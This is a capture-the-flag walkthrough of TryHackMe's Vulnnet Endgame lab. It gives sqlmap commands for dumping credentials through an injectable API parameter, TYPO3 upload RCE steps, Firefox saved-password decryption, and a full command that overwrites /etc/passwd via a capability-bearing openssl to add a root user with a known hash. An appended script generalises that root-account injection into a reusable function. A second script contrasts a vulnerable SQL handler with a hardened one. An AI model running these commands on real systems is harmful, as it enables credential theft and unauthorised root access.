Vulnnet Endgame - THM - Key Points

  • Initial scan reveals two open ports: 22 (SSH) and 80 (HTTP). The box introduction also gives us a domain name (vulnnet.thm), so after adding it to /etc/hosts we can enumerate virtual hosts
  • Run gobuster vhost -u http://vulnnet.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt (with gobuster 3.2 and later add --append-domain, otherwise the wordlist entries are sent as bare hostnames and nothing matches)
  • This turns up four more valid vhosts: blog, api, shop and admin1 (all under vulnnet.thm, so add them to /etc/hosts as well)
  • Directory brute forcing on the admin1 vhost reveals some interesting paths: vendor, fileadmin, typo3temp and typo3
  • TYPO3 is an open-source PHP CMS; its backend login lives under /typo3, but we have no credentials for it yet
  • Looking at the blog, opening a post triggers a request to the api vhost that carries a blog parameter, e.g. /vn_internals/api/v2/fetch/?blog=5
  • Tampering with that parameter (a stray quote, or blog=5 AND 1=2 changing the response) shows it is injectable, so we save the raw request to a file (VULNNET below) and let sqlmap automate dumping the database
  • sqlmap -r VULNNET --dbs lists three databases: blog, information_schema and vn_admin. information_schema is just the DBMS catalogue, so the other two are the interesting ones
  • The blog database holds a list of usernames and passwords, retrieved with: sqlmap -r VULNNET -D blog -T users -C username,password --dump
  • The vn_admin database holds one more username/password pair in be_users, TYPO3's backend user table: sqlmap -r VULNNET -D vn_admin -T be_users -C username,password --dump
  • The be_users hash cracks when the passwords from the blog database are used as the wordlist, which gives us the TYPO3 backend login as chris_w
  • Authenticated RCE in TYPO3 is well known: edit the installation-wide configuration so that the [BE][fileDenyPattern] setting no longer blocks .php files, upload a simple PHP reverse shell through the Filelist module into fileadmin, and request it
  • That gives us a shell as www-data. The only human account on the box is system (UID 1000 in /etc/passwd)
  • system's home contains a .mozilla directory with Firefox profiles. Copy a profile's key4.db and logins.json to our machine and run Firefox Decrypt (firefox_decrypt.py) against them; the saved credentials it recovers let us su to system
  • Running getcap -r / 2>/dev/null shows a copy of openssl in our (system's) home carrying a file capability, which is why this otherwise ordinary binary can overwrite /etc/passwd. As GTFOBins documents, openssl can write an arbitrary file with openssl enc -out FILE. Note that enc -out truncates the target rather than appending, so the command below reproduces every existing passwd entry and then adds a new UID 0 user (root2) with a known hash, and our job is done
  • The instruction is the following
echo "root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
avahi:x:115:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:116:121:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:118:122::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:119:123:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
system:x:1000:1000:system,,,:/home/system:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:123:65534::/run/sshd:/usr/sbin/nologin
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" | ./openssl enc -out "/etc/passwd"
  • WVLY0mgH0RtUI is a traditional DES crypt hash of the password mrcake, so su root2 with that password gives a root shell and the last flag. Merry hacking ;)
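As an added example (not from the original writeup) of why the blog parameter was injectable and how the users table became reachable through it, here is a sqlite3-backed stand-in for the api vhost's fetch endpoint, with the vulnerable handler beside a hardened one. The table layout, the chris_w row and the shape of the endpoint's query are constructed for the demo; the page only reports that tampering showed injection.

```shell
#!/bin/sh
# Added example: a sqlite3 stand-in for /vn_internals/api/v2/fetch/?blog=N.
# Schema, rows and function names are constructed for the demo, not taken
# from the box.
DB="${DB:-$(mktemp)}"

# Build a fresh demo database: the posts table the endpoint is meant to
# serve, and a users table it was never meant to expose.
setup_db() {
    rm -f "$DB"
    sqlite3 "$DB" <<'EOF'
CREATE TABLE posts(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
CREATE TABLE users(username TEXT, password TEXT);
INSERT INTO posts VALUES (5, 'Fifth post', 'Hello from the blog');
INSERT INTO users VALUES ('chris_w', 'constructed-hash');
EOF
}

# Vulnerable handler: the blog parameter is pasted into the SQL text, so
# "5 UNION SELECT username, password FROM users" runs as SQL and the
# users rows come back in the same result set as the post.
fetch_vuln() {
    sqlite3 -separator '|' "$DB" \
        "SELECT title, body FROM posts WHERE id = $1"
}

# Hardened handler: the id must be a plain non-empty decimal integer before
# it gets anywhere near SQL. In the real application the fix is a prepared
# statement with the id bound as a parameter; the sqlite3 CLI has no
# portable placeholder syntax, so strict validation stands in for it here.
fetch_safe() {
    case "$1" in
        ''|*[!0-9]*)
            echo "rejected: blog id must be numeric" >&2
            return 1 ;;
    esac
    sqlite3 -separator '|' "$DB" \
        "SELECT title, body FROM posts WHERE id = $1"
}

# Usage:
#   setup_db
#   fetch_vuln '5 UNION SELECT username, password FROM users'  # leaks users
#   fetch_safe '5 UNION SELECT username, password FROM users'  # rejected
```

Running fetch_vuln with the UNION payload prints the post row followed by chris_w and its password; fetch_safe refuses the same input and only answers a bare numeric id. The integer allow-list is also a sensible check to keep in front of a prepared statement for a parameter that is only ever a number.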
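The same privilege escalation as a small script, added here rather than taken from the writeup: because openssl enc -out truncates its target (which is why the command above carries every existing passwd line), the script copies the current file, appends a UID 0 entry with a freshly generated SHA-512-crypt hash, and writes the copy back through openssl. It assumes OPENSSL points at the capability-bearing binary from system's home (it defaults to the system openssl so the script also runs against a scratch file on any Linux box) and that it supports passwd -6; the function names are mine.

```shell
#!/bin/sh
# Added example: append a UID 0 account to a passwd file via an openssl
# binary that is allowed to write it. OPENSSL is assumed to be the
# capability-bearing copy (./openssl in the writeup); it defaults to the
# system one so the functions can be exercised against a temp file.
OPENSSL="${OPENSSL:-openssl}"

# Print a passwd(5) line for a new UID 0 / GID 0 account whose password is
# stored as a SHA-512-crypt hash. `openssl passwd -6` picks a random salt,
# so the hash differs on every run but always verifies against "$pass".
make_root_entry() {
    name="$1"; pass="$2"
    hash=$("$OPENSSL" passwd -6 "$pass") || return 1
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$name" "$hash"
}

# Append the entry to TARGET (e.g. /etc/passwd) using `openssl enc -out`.
# enc -out truncates the destination, so the current contents are copied to
# a temp file first and handed back with -in; piping `cat "$target"` straight
# into openssl would race against that truncation and could lose lines.
append_root_user() {
    target="$1"; name="$2"; pass="$3"
    tmp=$(mktemp) || return 1
    cat "$target" > "$tmp" || return 1
    make_root_entry "$name" "$pass" >> "$tmp" || return 1
    "$OPENSSL" enc -in "$tmp" -out "$target" || return 1
    rm -f "$tmp"
}

# Check that TARGET contains an entry named NAME with UID 0, i.e. that
# `su NAME` will hand out a root shell.
has_root_entry() {
    awk -F: -v u="$2" '$1 == u && $3 == 0 { found = 1 } END { exit !found }' "$1"
}

# Usage on the box (run from the directory holding the capable binary):
#   OPENSSL=./openssl append_root_user /etc/passwd root2 mrcake
#   has_root_entry /etc/passwd root2 && su root2
```

Nothing in the original line is retyped, so a passwd file with more or different service accounts than the one shown above is handled the same way, and the hash is generated on the spot instead of reusing a well-known one.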

More from emacab98